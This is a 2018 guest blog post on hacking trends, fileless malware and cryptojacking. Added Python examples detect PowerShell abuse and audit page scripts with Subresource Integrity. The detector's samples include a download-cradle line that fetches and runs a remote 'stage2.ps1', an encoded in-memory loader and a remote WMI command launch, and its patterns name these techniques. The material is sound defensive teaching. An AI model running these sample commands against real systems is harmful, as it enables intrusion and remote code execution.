Spotlight on leadership and cybersecurity in changing times
Metin Mitchell, Managing Partner, and guest contributors
2018 Trends in Hacking and Cybersecurity
Guest blog by Raef Meeuwisse, passionate about cyber and AI, keynote speaker, CISO consultant and author of numerous cybersecurity publications, including the highly successful title ‘Cybersecurity for Beginners’.
According to a survey published last year (the Fortinet Global Threat Report 2017), over 90% of organizations had experienced at least one attack that used a vulnerability more than three years old. The same report notes that almost no attacks rely on zero day* threats.
* Zero day (or 0-day) is the term for a vulnerability that is newly discovered, or already being exploited, before any patch or other specific countermeasure is available.
So, if you can close all of your organization's basic cybersecurity gaps, will that make your enterprise safe? Unfortunately, the answer is ‘no’.
It is true that the majority of devastating breaches (so far) have hit organizations whose gaps in cybersecurity defences were large enough to drive a fleet of trucks through. WannaCry and NotPetya caused large-scale devastation in enterprises that had not taken basic cyber hygiene seriously: in both cases the SMB vulnerability the malware spread through had been patched by Microsoft months before the outbreak.
However, although getting the cybersecurity basics in place will make your organization safer, it will not make it hacker proof. It turns out that hackers are fashion conscious. Although an exploit more than a year old can still compromise most enterprises, hackers also want tools in their inventory that can exploit and monetise even the most robust organizations.
Just as you and I might look for the latest smartphone to hit the shelves, streetwise hackers constantly watch the blogs and advisories for emerging vulnerabilities they can take advantage of. Within 24 hours of a significant new vulnerability being announced to the world, an initial exploit for it can often be found on the darknet.
For a hacker, being an early adopter of a new style of cyber attack has the potential to make a lot of money. Hackers look for the low hanging fruit, the easiest targets to monetise. Brand new exploits often provide those opportunities because they target areas that do not yet have adequate cyber defences in place.
So what are some of the main trends that cyber threat analysts are discussing in early 2018?
- Fileless malware – malicious software designed to operate in the memory of a computer, without writing files to the disk or storage of a device. It typically runs through tooling that is already present on the system, such as PowerShell or WMI. Because most traditional antimalware products look for changes in the file system, this form of malware can bypass the security technologies at most companies at present.
  - Potential impact – because it runs without being installed, it has the potential to bypass most existing forms of security, steal information, passively scrutinise environments and help launch more devastating attacks.
  - What can be done? Upgrading or adding security software capable of identifying and blocking fileless malware (products that inspect memory and script behaviour rather than only files) can overcome the threat. At present, it is believed that less than 10% of enterprises have implemented defences against fileless malware. You can also harden the configuration of devices to restrict and monitor the tooling that fileless malware relies upon, such as PowerShell and WMI: turn on PowerShell script block logging so that what actually executes is recorded, apply constrained language mode where it is practical, and limit which accounts may use WMI remotely. A hardened network configuration (segmentation, and blocking remote management protocols between workstations) can also help to prevent fileless malware from spreading.
- Cryptojacking – cryptocurrencies are very lucrative in early 2018 and there is plenty of real money to be made from these virtual currencies. One way to make money is to use computing power to mine them. However, computers cost money and need power to operate. If you are a hacker, you can simply steal the use of other people's computers and electricity. Welcome to cryptojacking: making money by hijacking other people's computing power to mine cryptocurrency. The economics favour the attacker because the victim pays for the hardware and the electricity while the hacker keeps the coins. Effectively, every moment a device is being cryptojacked, its power and computing costs are being paid on the hacker's behalf. This might not sound like a big problem, however, cryptojacking scripts have already been found on large numbers of websites, even government websites. Those scripts use the processing power of the computers that browse to them, for as long as the page stays open. If you can get thousands or even millions of devices to run cryptojacking scripts, the money soon adds up. Given the power and computing demands of crypto mining, this is potentially a multi-billion dollar hacker activity in the making.
  - Potential impact – it can be brand damaging to have customer-facing websites causing this problem on customer computers. It can also cause internal operations to slow down and become more expensive. An upward shift in power demand and computing utilisation can be hard to spot unless it is being measured. Indeed, there have even been examples of rogue insiders intentionally using ‘spare’ enterprise computing capacity to mine currency for their own benefit.
  - What can be done? New forms of cryptojacking attack continue to emerge. Based on existing attacks, controls include installing anti-mining add-ons in browsers such as Chrome, blocking scripts by default (or restricting the sources a page may load scripts from with a Content-Security-Policy header), and ensuring that scripts included in your own websites and programs are authenticated before use, for example with Subresource Integrity hashes on third-party scripts. It is also likely that endpoint security will develop to identify, alert on and block mining activity.
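To make the fileless malware detection point concrete, here is an added example (my own illustration, not code from the article or from any product it mentions) that scores PowerShell script block log entries for the behaviours in-memory tooling depends on. It assumes script block logging is enabled so that the executed text reaches the log (the ScriptBlockText field of event ID 4104), decodes -EncodedCommand payloads before scanning them, and runs over constructed sample lines; the indicator list and the weights are illustrative assumptions, not a vendor signature set.

```python
"""Flag fileless-malware indicators in PowerShell script block logs.

Added example, not code from the original article. The log lines below are
constructed samples standing in for the ScriptBlockText field of Windows
event ID 4104 (PowerShell Script Block Logging); the indicator list and the
weights are an illustrative starting point, not a complete signature set.
"""
import base64
import re
from typing import Optional

# Behaviours typical of in-memory tooling: run text as code, pull a payload
# over the network, load an assembly from bytes, spawn a process through WMI,
# and launch flags that hide the window or skip the user's profile.
INDICATORS = {
    "invoke_expression": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "download_cradle": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I),
    "reflective_load": re.compile(r"\[(system\.)?reflection\.assembly\]::load", re.I),
    "base64_decode": re.compile(r"frombase64string", re.I),
    "wmi_process": re.compile(r"win32_process.*\bcreate\b|invoke-wmimethod", re.I),
    "bypass_flags": re.compile(
        r"-(nop|noprofile|w(indowstyle)?\s+hidden|ep\s+bypass|executionpolicy\s+bypass)\b", re.I),
}
# -EncodedCommand takes base64 of the UTF-16LE command text.
ENCODED = re.compile(r"-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Rough weights (an assumption for this example): one strong indicator escalates.
WEIGHT = {"encoded_command": 3, "reflective_load": 3, "wmi_process": 3,
          "invoke_expression": 2, "download_cradle": 2,
          "bypass_flags": 1, "base64_decode": 1}


def decode_encoded_command(blob: str) -> Optional[str]:
    """Decode a -EncodedCommand payload so its contents can be inspected."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def encode_command(cmd: str) -> str:
    """Build an -EncodedCommand payload (used here only to construct a sample)."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


def analyse(script_text: str) -> dict:
    """Score one script block; an encoded command is decoded and scanned too."""
    hits = set()
    decoded = None
    raw = script_text
    match = ENCODED.search(script_text)
    if match:
        hits.add("encoded_command")
        decoded = decode_encoded_command(match.group(2))
        # Scan the decoded text instead of the base64 blob itself.
        raw = script_text[:match.start(2)] + "<encoded>" + script_text[match.end(2):]
    for text in filter(None, (raw, decoded)):
        for name, pattern in INDICATORS.items():
            if pattern.search(text):
                hits.add(name)
    score = sum(WEIGHT[h] for h in hits)
    verdict = "suspicious" if score >= 3 else "review" if score else "benign"
    return {"hits": sorted(hits), "score": score, "verdict": verdict, "decoded": decoded}


# Constructed sample script blocks (not real telemetry).
SAMPLE_BLOCKS = [
    # routine administration
    "Get-Service | Where-Object {$_.Status -eq 'Running'} | Export-Csv C:\\temp\\svc.csv",
    # download cradle: the payload never touches disk
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage2.ps1')",
    # hidden, profile-less launcher whose encoded payload loads an assembly from memory
    "powershell.exe -nop -w hidden -enc " + encode_command(
        "[System.Reflection.Assembly]::Load([Convert]::FromBase64String($b)) | Out-Null"),
    # WMI used to start a process on another host without dropping a file there
    "Invoke-WmiMethod -Class Win32_Process -Name Create "
    "-ArgumentList 'cmd /c whoami' -ComputerName srv01",
]


def triage(blocks) -> list:
    """Analyse every block and return the reports in input order."""
    return [analyse(b) for b in blocks]


if __name__ == "__main__":
    for block, report in zip(SAMPLE_BLOCKS, triage(SAMPLE_BLOCKS)):
        print(f"{report['verdict']:<10} score={report['score']} hits={report['hits']}")
        print(f"           {block[:70]}")
```

Run against the four samples, the routine administration line stays benign while the download cradle, the encoded reflective loader and the WMI process launch all score as suspicious. The important design choice is decoding the -EncodedCommand blob before matching: without that step the base64 hides every other indicator, which is exactly why attackers use it.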
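And for the cryptojacking controls, here is an added example (again my own illustration, not code from the article) that audits the script tags of a web page for the two weaknesses the controls above address: scripts loaded from hosts outside an allowlist, which a Content-Security-Policy would block, and scripts that are not authenticated before use, which Subresource Integrity hashes catch. The HTML, script bodies and host names are constructed samples on reserved example domains, and the "fetched" dictionary stands in for what a browser would actually download.

```python
"""Audit a page's <script> tags for cryptojacking exposure.

Added example, not code from the original article. It exercises two controls:
an allowlist of script sources (expressed as a Content-Security-Policy header)
and authentication of scripts before use (Subresource Integrity hashes). The
HTML, script bodies and host names are constructed samples on reserved example
domains; the "fetched" dictionary stands in for what a browser would download.
"""
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse


def sri_hash(script_body: bytes, algo: str = "sha384") -> str:
    """Value a <script integrity="..."> attribute must carry for this body."""
    digest = hashlib.new(algo, script_body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def build_csp(allowed_hosts) -> str:
    """Script allowlist to send as a Content-Security-Policy response header."""
    sources = " ".join(sorted(f"https://{h}" for h in allowed_hosts))
    return f"script-src 'self' {sources}; object-src 'none'"


class ScriptCollector(HTMLParser):
    """Record src, integrity and inline body of every <script> in a page."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self._current = {"src": a.get("src"), "integrity": a.get("integrity"), "body": ""}
            self.scripts.append(self._current)

    def handle_data(self, data):
        if self._current is not None:
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag == "script":
            self._current = None


def audit(html: str, allowed_hosts, fetched: dict) -> list:
    """Return one finding per weakness that a mining script could exploit."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for s in parser.scripts:
        if s["src"] is None:
            # Inline code cannot carry an SRI hash; a strict CSP blocks it unless nonced.
            findings.append({"check": "inline-script", "src": None,
                             "fix": "move to a file served from an allowlisted host"})
            continue
        host = urlparse(s["src"]).hostname
        if host not in allowed_hosts:
            findings.append({"check": "host-not-allowlisted", "src": s["src"],
                             "fix": f"CSP would block it: {build_csp(allowed_hosts)}"})
        if not s["integrity"]:
            findings.append({"check": "missing-integrity", "src": s["src"],
                             "fix": "add integrity and crossorigin attributes"})
        elif s["src"] in fetched and sri_hash(fetched[s["src"]]) not in s["integrity"].split():
            # The served file no longer matches what the page author vouched for.
            findings.append({"check": "integrity-mismatch", "src": s["src"],
                             "fix": "browser will refuse to run it; investigate the host"})
    return findings


# --- constructed sample page and script bodies ------------------------------
APP_JS = b"window.app = {version: '1.0'};\n"
VENDOR_JS = b"/* vendor build 4.2 */\n"
WIDGET_JS_ORIGINAL = b"(function () { /* accessibility widget */ })();\n"
# Same file after the third-party host was tampered with: a miner call appended.
WIDGET_JS_SERVED = WIDGET_JS_ORIGINAL + b"startMiner({threads: 4});\n"

ALLOWED_HOSTS = {"cdn.example.net"}
FETCHED = {
    "https://cdn.example.net/app.js": APP_JS,
    "https://cdn.example.net/vendor.js": VENDOR_JS,
    "https://static.example.org/widget.js": WIDGET_JS_SERVED,
}
SAMPLE_HTML = f"""<html><head>
<script src="https://cdn.example.net/app.js" integrity="{sri_hash(APP_JS)}" crossorigin="anonymous"></script>
<script src="https://cdn.example.net/vendor.js"></script>
<script src="https://static.example.org/widget.js" integrity="{sri_hash(WIDGET_JS_ORIGINAL)}" crossorigin="anonymous"></script>
<script>startMiner({{threads: 2}});</script>
</head></html>"""

if __name__ == "__main__":
    print(build_csp(ALLOWED_HOSTS))
    for f in audit(SAMPLE_HTML, ALLOWED_HOSTS, FETCHED):
        print(f"{f['check']:<22} {f['src'] or '<inline>'}: {f['fix']}")
```

The sample page reproduces the pattern seen in the government website incidents: the site's own scripts are fine, but a third-party widget has been modified at its source. Because the page author pinned a hash with the integrity attribute (and the crossorigin attribute SRI needs on cross-origin scripts), a browser refuses to execute the tampered file, and the audit reports the mismatch; the script without an integrity attribute and the injected inline snippet are reported as the remaining exposure.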
The majority of hacking activity may exploit old vulnerabilities, but beware: the hackers who create the markets of tomorrow are already making a lot of money from newer vulnerabilities. The latest vulnerabilities often require more than basic cyber hygiene to defend against, and because all of the threats above are known, they are no longer considered zero day threats.
The cyber threat landscape continues to evolve and to require ever more sophisticated and complex defence measures. And what cyber threat scares me most in 2018? DDoS. More about that topic later in the year.
Published in Cyber security